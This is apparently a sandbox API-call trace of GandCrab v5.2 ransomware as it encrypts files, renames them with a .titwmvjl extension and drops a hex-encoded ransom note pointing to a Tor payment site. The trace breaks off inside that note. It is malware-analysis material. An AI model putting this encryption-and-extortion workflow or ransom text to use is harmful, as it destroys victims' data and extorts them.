VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned 84 [0095.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned 84 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="desktop.ini") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="autorun.inf") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="ntuser.dat") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="iconcache.db") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="bootsect.bak") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="boot.ini") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="ntuser.dat.log") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="thumbs.db") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="ntldr") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="NTDETECT.COM") returned -1 [0095.428] lstrcmpiW (lpString1="KyZTn6pjXDziIBU471.avi", lpString2="Bootfont.bin") returned 1 [0095.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi") returned 84 [0095.428] lstrlenW (lpString=".avi") returned 4 [0095.428] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.428] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0095.428] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.428] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.429] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\kyztn6pjxdziibu471.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2bc [0095.429] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.429] ReadFile (in: hFile=0x2bc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ef48*=0x21c, lpOverlapped=0x0) returned 1 [0095.430] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.430] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.430] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.430] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.431] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.431] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ef04 | out: pbBuffer=0x259ef04) returned 1 [0095.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.431] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.431] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.431] CryptAcquireContextW (in: phProv=0x259ee78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee78*=0x4c9980) returned 1 [0095.431] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.432] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.432] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.432] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ef24 | out: pbBuffer=0x259ef24) returned 1 [0095.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.432] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.432] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.432] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.432] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.433] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x503838) returned 1 [0095.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.433] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.433] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.433] GetLastError () returned 0x0 [0095.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.433] CryptDestroyKey (hKey=0x503838) returned 1 [0095.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.434] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.434] CryptAcquireContextW (in: phProv=0x259ee6c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ee6c*=0x4c9980) returned 1 [0095.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.434] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ee70 | out: phKey=0x259ee70*=0x5038f8) returned 1 [0095.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.434] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ee64, pdwDataLen=0x259ee68, dwFlags=0x0 | out: pbData=0x259ee64*=0x800, pdwDataLen=0x259ee68*=0x4) returned 1 [0095.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.435] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ee9c*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ee9c*=0x100) returned 1 [0095.435] GetLastError () returned 0x0 [0095.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.435] CryptDestroyKey (hKey=0x5038f8) returned 1 [0095.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.435] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.435] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.435] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.436] ReadFile (in: hFile=0x2bc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ef48, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ef48*=0x16b35, lpOverlapped=0x0) returned 1 [0095.447] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0xfffe94cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.448] WriteFile (in: hFile=0x2bc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16b35, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ef2c*=0x16b35, lpOverlapped=0x0) returned 1 [0095.449] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.449] WriteFile (in: hFile=0x2bc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ef2c, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ef2c*=0x21c, lpOverlapped=0x0) returned 1 [0095.450] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.454] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.455] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.455] CloseHandle (hObject=0x2bc) returned 1 [0095.456] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\kyztn6pjxdziibu471.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\KyZTn6pjXDziIBU471.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\kyztn6pjxdziibu471.avi.titwmvjl"), dwFlags=0x1) returned 1 [0095.456] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.457] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0095.457] lstrcmpW (lpString1="LKAlvv468QzU1uc", lpString2=".") returned 1 [0095.457] lstrcmpW (lpString1="LKAlvv468QzU1uc", lpString2="..") returned 1 [0095.457] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\", lpString2="LKAlvv468QzU1uc" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc" [0095.457] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\" [0095.457] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.457] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.457] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.460] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.460] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.461] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.461] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.461] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.461] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\\\TITWMVJL-DECRYPT.txt") returned 99 [0095.461] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0095.461] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\